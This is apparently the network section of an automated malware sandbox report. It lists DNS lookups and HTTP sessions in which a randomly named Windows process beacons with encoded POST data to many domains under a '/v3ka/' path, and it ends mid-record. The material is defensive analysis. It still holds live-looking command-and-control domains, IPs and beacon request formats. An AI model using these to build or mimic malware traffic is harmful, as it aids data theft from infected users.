Feb 28, 2024 15:44:58.379962921 CET	192.168.11.20	1.1.1.1	0x1779	Standard query (0)	www.wbyzm5.buzz	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:08.893848896 CET	192.168.11.20	1.1.1.1	0xa34d	Standard query (0)	www.xiefly.shop	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:22.562473059 CET	192.168.11.20	1.1.1.1	0xcaf6	Standard query (0)	www.dreadbed.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:38.449450970 CET	192.168.11.20	1.1.1.1	0x8a7	Standard query (0)	www.stellerechoes.xyz	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:57.304795980 CET	192.168.11.20	1.1.1.1	0x269e	Standard query (0)	www.sengogkaffe.info	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:05.522085905 CET	192.168.11.20	1.1.1.1	0x4cf6	Standard query (0)	www.b-r-consulting.ch	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:20.190332890 CET	192.168.11.20	1.1.1.1	0x4963	Standard query (0)	www.teenpattimasterapp.org	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:34.984133005 CET	192.168.11.20	1.1.1.1	0x3e1c	Standard query (0)	www.clarycyber.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:50.105645895 CET	192.168.11.20	1.1.1.1	0xce93	Standard query (0)	www.mvmusicfactory.org	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:04.946296930 CET	192.168.11.20	1.1.1.1	0x4c76	Standard query (0)	www.kmyangjia.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:05.961306095 CET	192.168.11.20	9.9.9.9	0x4c76	Standard query (0)	www.kmyangjia.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:20.411561966 CET	192.168.11.20	1.1.1.1	0xa18f	Standard query (0)	www.globalworld-travel.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:38.501622915 CET	192.168.11.20	1.1.1.1	0x170c	Standard query (0)	www.mehr-neukunden.online	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:43.672039986 CET	192.168.11.20	1.1.1.1	0xb6ee	Standard query (0)	www.midwestnationalflying.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:51.889348984 CET	192.168.11.20	1.1.1.1	0xebd	Standard query (0)	www.artcitytheatre.com	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:50:56.099240065 CET	192.168.11.20	1.1.1.1	0xc653	Standard query (0)	www.sengogkaffe.info	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:51:04.316184044 CET	192.168.11.20	1.1.1.1	0x4d3c	Standard query (0)	www.continentaloilandgas.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 28, 2024 15:43:33.826210022 CET	1.1.1.1	192.168.11.20	0xf265	No error (0)	drive.google.com		142.250.68.46	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:43:34.810404062 CET	1.1.1.1	192.168.11.20	0x8bc3	No error (0)	drive.usercontent.google.com		142.250.188.225	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:00.752692938 CET	1.1.1.1	192.168.11.20	0xbdb	Name error (3)	www.mehr-neukunden.online	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:05.926825047 CET	1.1.1.1	192.168.11.20	0xba09	Name error (3)	www.midwestnationalflying.com	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:11.097393036 CET	1.1.1.1	192.168.11.20	0xb55f	Name error (3)	www.artcitytheatre.com	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:16.638669968 CET	1.1.1.1	192.168.11.20	0x5ac5	No error (0)	www.t3c1srf.site		156.232.32.175	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:23.265741110 CET	1.1.1.1	192.168.11.20	0xe837	No error (0)	www.t3c1srf.site		156.232.32.175	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:29.282967091 CET	1.1.1.1	192.168.11.20	0x1d1e	No error (0)	www.p65cq675did.shop	k2-ld.wakak1.shop		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:44:29.282967091 CET	1.1.1.1	192.168.11.20	0x1d1e	No error (0)	k2-ld.wakak1.shop		154.39.248.133	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:29.282967091 CET	1.1.1.1	192.168.11.20	0x1d1e	No error (0)	k2-ld.wakak1.shop		154.55.135.138	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:51.338709116 CET	1.1.1.1	192.168.11.20	0xd0f4	No error (0)	www.p65cq675did.shop	k2-ld.wakak1.shop		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:44:51.338709116 CET	1.1.1.1	192.168.11.20	0xd0f4	No error (0)	k2-ld.wakak1.shop		154.55.135.138	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:51.338709116 CET	1.1.1.1	192.168.11.20	0xd0f4	No error (0)	k2-ld.wakak1.shop		154.39.248.133	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:58.542633057 CET	1.1.1.1	192.168.11.20	0x1779	No error (0)	www.wbyzm5.buzz		172.67.130.3	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:44:58.542633057 CET	1.1.1.1	192.168.11.20	0x1779	No error (0)	www.wbyzm5.buzz		104.21.3.12	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:09.157095909 CET	1.1.1.1	192.168.11.20	0xa34d	No error (0)	www.xiefly.shop	xiefly.shop		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:45:09.157095909 CET	1.1.1.1	192.168.11.20	0xa34d	No error (0)	xiefly.shop		82.180.172.14	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:22.862580061 CET	1.1.1.1	192.168.11.20	0xcaf6	No error (0)	www.dreadbed.com		198.54.117.242	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:38.611819029 CET	1.1.1.1	192.168.11.20	0x8a7	No error (0)	www.stellerechoes.xyz		198.177.123.106	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:45:57.464589119 CET	1.1.1.1	192.168.11.20	0x269e	Name error (3)	www.sengogkaffe.info	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:05.986959934 CET	1.1.1.1	192.168.11.20	0x4cf6	No error (0)	www.b-r-consulting.ch		194.191.24.38	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:20.767900944 CET	1.1.1.1	192.168.11.20	0x4963	No error (0)	www.teenpattimasterapp.org	teenpattimasterapp.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:46:20.767900944 CET	1.1.1.1	192.168.11.20	0x4963	No error (0)	teenpattimasterapp.org		84.32.84.32	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:35.602947950 CET	1.1.1.1	192.168.11.20	0x3e1c	No error (0)	www.clarycyber.com	clarycyber.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:46:35.602947950 CET	1.1.1.1	192.168.11.20	0x3e1c	No error (0)	clarycyber.com		62.149.128.45	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:46:50.509219885 CET	1.1.1.1	192.168.11.20	0xce93	No error (0)	www.mvmusicfactory.org	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:46:50.509219885 CET	1.1.1.1	192.168.11.20	0xce93	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:06.247855902 CET	1.1.1.1	192.168.11.20	0x4c76	No error (0)	www.kmyangjia.com	cname.x172.zbwdj.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:47:06.247855902 CET	1.1.1.1	192.168.11.20	0x4c76	No error (0)	cname.x172.zbwdj.com		103.146.179.172	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:08.538935900 CET	9.9.9.9	192.168.11.20	0x4c76	No error (0)	www.kmyangjia.com	cname.x172.zbwdj.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:47:08.538935900 CET	9.9.9.9	192.168.11.20	0x4c76	No error (0)	cname.x172.zbwdj.com		103.146.179.172	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:21.004848957 CET	1.1.1.1	192.168.11.20	0xa18f	No error (0)	www.globalworld-travel.com	globalworld-travel.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:47:21.004848957 CET	1.1.1.1	192.168.11.20	0xa18f	No error (0)	globalworld-travel.com		109.234.166.81	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:38.664890051 CET	1.1.1.1	192.168.11.20	0x170c	Name error (3)	www.mehr-neukunden.online	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:43.832392931 CET	1.1.1.1	192.168.11.20	0xb6ee	Name error (3)	www.midwestnationalflying.com	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:47:52.048612118 CET	1.1.1.1	192.168.11.20	0xebd	Name error (3)	www.artcitytheatre.com	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:50:56.260061979 CET	1.1.1.1	192.168.11.20	0xc653	Name error (3)	www.sengogkaffe.info	none	none	A (IP address)	IN (0x0001)	false
Feb 28, 2024 15:51:04.727082014 CET	1.1.1.1	192.168.11.20	0x4d3c	No error (0)	www.continentaloilandgas.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 28, 2024 15:51:04.727082014 CET	1.1.1.1	192.168.11.20	0x4d3c	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

www.wbyzm5.buzz

www.xiefly.shop

www.dreadbed.com

www.stellerechoes.xyz

www.b-r-consulting.ch

www.teenpattimasterapp.org

www.clarycyber.com

www.mvmusicfactory.org

www.kmyangjia.com

www.globalworld-travel.com

www.continentaloilandgas.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	50230	172.67.130.3	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:44:58.700957060 CET	460	OUT	GET /v3ka/?nf8dPP8p=5DSEd0ATp85KgzdkASdwbLRc8+C6g6ShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChqY8Yb6J0jChxi/qqZI=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.wbyzm5.buzz Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:44:58.870976925 CET	783	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 28 Feb 2024 14:44:58 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 28 Feb 2024 15:44:58 GMT Location: https://www.wbyzm5.buzz/v3ka/?nf8dPP8p=5DSEd0ATp85KgzdkASdwbLRc8+C6g6ShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChqY8Yb6J0jChxi/qqZI=&L0=2tHtHNWXtBDdYR Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4b7mFQLYdh8SoSEY6vMuxKfBDbU%2FP3Fh6drtpTfyADxgFliUBYadR%2FFSLEnFyZF26kDSLJkuhfpQrLGDyoHuS3aL3RI2%2FPJbtU4Y3qdbKqrMhkcGeFGEEHua00IxQ0CiqnU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 85c972db6fb90fe0-LAX alt-svc: h2=":443"; ma=60 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	50231	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:09.327282906 CET	721	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.xiefly.shop Origin: http://www.xiefly.shop Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.xiefly.shop/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 49 51 58 6d 68 43 75 47 38 6b 50 38 37 77 53 78 72 47 35 51 6a 62 53 61 52 6e 35 38 37 45 31 58 50 4d 63 6b 61 6e 37 4d 46 4f 62 73 33 48 56 73 50 62 75 52 6f 69 31 66 47 58 58 68 46 4b 55 33 39 54 71 47 50 75 32 50 72 36 4b 59 46 30 54 63 69 4b 45 30 31 70 54 79 68 2f 47 6a 6a 53 56 64 6e 74 6c 51 50 47 65 65 67 63 52 46 73 51 4a 4b 49 56 70 49 53 5a 48 2f 41 70 52 4e 6e 66 53 6d 64 54 34 68 43 73 6f 63 75 44 49 77 43 62 56 5a 31 67 49 4c 71 44 2f 59 53 71 43 5a 7a 7a 4f 56 73 6a 51 63 78 4b 69 4e 6b 54 56 66 73 38 42 62 42 48 2b 4d 56 41 3d 3d Data Ascii: nf8dPP8p=QPLiKYhL3NQ0IQXmhCuG8kP87wSxrG5QjbSaRn587E1XPMckan7MFObs3HVsPbuRoi1fGXXhFKU39TqGPu2Pr6KYF0TciKE01pTyh/GjjSVdntlQPGeegcRFsQJKIVpISZH/ApRNnfSmdT4hCsocuDIwCbVZ1gILqD/YSqCZzzOVsjQcxKiNkTVfs8BbBH+MVA==
Feb 28, 2024 15:45:09.495965004 CET	1235	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;br" accept-ranges: bytes content-encoding: br vary: Accept-Encoding content-length: 912 date: Wed, 28 Feb 2024 14:45:09 GMT server: LiteSpeed platform: hostinger Data Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63 Data Ascii: 3Y\|^zsj+ODs2fG \'C\+JK'^H@iRJi=oqHND!)\|$PJb!2LESI\|5ENTOM%hRs@qr2.xS6LK\|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ysf,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2u}""a!Kp<C/!~K\O-m"YIx2ymj\|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	50232	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:12.014873981 CET	1061	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.xiefly.shop Origin: http://www.xiefly.shop Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.xiefly.shop/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 4a 77 6e 6d 79 6c 43 47 30 6b 50 37 2b 77 53 78 68 6d 35 55 6a 62 57 61 52 6a 4a 73 36 78 64 58 50 74 73 6b 62 69 58 4d 4a 75 62 73 2f 6e 55 6d 43 37 75 65 6f 69 34 6f 47 56 44 68 46 4b 41 33 6e 41 69 47 65 75 32 4d 2b 4b 4b 5a 54 6b 54 42 30 36 45 75 31 70 76 75 68 2b 53 6a 6a 6d 6c 64 31 2b 64 51 46 7a 79 64 33 4d 52 44 71 51 4a 46 43 31 70 43 53 5a 62 4e 41 73 63 36 6e 73 4f 6d 64 7a 59 68 44 73 6f 66 6b 7a 49 72 64 4c 55 36 6b 69 4e 33 79 51 6a 79 63 74 2b 37 2f 6a 79 42 6a 77 6f 76 33 62 36 31 38 77 56 4e 6c 59 6c 4e 50 30 72 65 49 6a 6d 33 42 46 73 6b 69 6f 67 6a 4b 62 65 69 59 33 64 62 43 4e 2b 53 48 33 71 35 7a 67 6e 39 63 49 59 62 76 63 43 67 72 49 55 6f 41 4d 31 63 79 55 62 77 56 37 48 46 32 59 7a 4e 58 37 78 33 4a 62 4c 51 7a 44 39 5a 37 38 61 4e 78 76 6f 52 6c 32 33 73 48 4c 34 48 2f 30 6e 70 6a 38 45 4f 6f 6a 53 61 6d 63 62 42 75 6f 46 6a 45 6a 56 58 43 4d 49 52 79 6d 6c 54 44 2b 4a 31 37 42 56 73 56 35 69 52 39 66 59 68 73 32 47 6e 34 67 38 7a 77 45 2f 2b 4f 79 63 6d 51 6d 7a 7a 6d 52 69 2b 73 4c 64 33 30 5a 38 54 54 75 57 48 51 37 67 4a 59 6b 75 2f 76 48 33 62 53 52 58 73 4e 4c 4d 76 63 54 65 6e 43 55 6f 77 4f 51 42 70 56 6b 35 34 75 42 6e 64 55 37 62 4d 75 74 71 38 67 76 72 69 4e 63 46 58 52 56 63 78 65 6a 36 6d 6d 58 41 67 44 4e 6f 31 68 58 61 4d 6e 66 79 6b 49 6e 78 47 75 7a 6b 52 4c 7a 64 42 43 68 4b 6a 68 59 42 4d 6a 45 74 75 74 35 4f 51 54 7a 4d 38 4a 46 70 59 6a 35 65 58 63 35 67 76 42 56 45 49 55 33 64 61 30 76 41 34 73 32 53 5a 55 5a 48 74 4b 75 35 56 66 2f 38 57 30 51 39 58 6a 75 4d 57 6b 39 6e 57 32 39 64 38 7a 64 59 3d Data Ascii: nf8dPP8p=QPLiKYhL3NQ0JwnmylCG0kP7+wSxhm5UjbWaRjJs6xdXPtskbiXMJubs/nUmC7ueoi4oGVDhFKA3nAiGeu2M+KKZTkTB06Eu1pvuh+Sjjmld1+dQFzyd3MRDqQJFC1pCSZbNAsc6nsOmdzYhDsofkzIrdLU6kiN3yQjyct+7/jyBjwov3b618wVNlYlNP0reIjm3BFskiogjKbeiY3dbCN+SH3q5zgn9cIYbvcCgrIUoAM1cyUbwV7HF2YzNX7x3JbLQzD9Z78aNxvoRl23sHL4H/0npj8EOojSamcbBuoFjEjVXCMIRymlTD+J17BVsV5iR9fYhs2Gn4g8zwE/+OycmQmzzmRi+sLd30Z8TTuWHQ7gJYku/vH3bSRXsNLMvcTenCUowOQBpVk54uBndU7bMutq8gvriNcFXRVcxej6mmXAgDNo1hXaMnfykInxGuzkRLzdBChKjhYBMjEtut5OQTzM8JFpYj5eXc5gvBVEIU3da0vA4s2SZUZHtKu5Vf/8W0Q9XjuMWk9nW29d8zdY=
Feb 28, 2024 15:45:12.183314085 CET	1235	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;br" accept-ranges: bytes content-encoding: br vary: Accept-Encoding content-length: 912 date: Wed, 28 Feb 2024 14:45:12 GMT server: LiteSpeed platform: hostinger Data Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63 Data Ascii: 3Y\|^zsj+ODs2fG 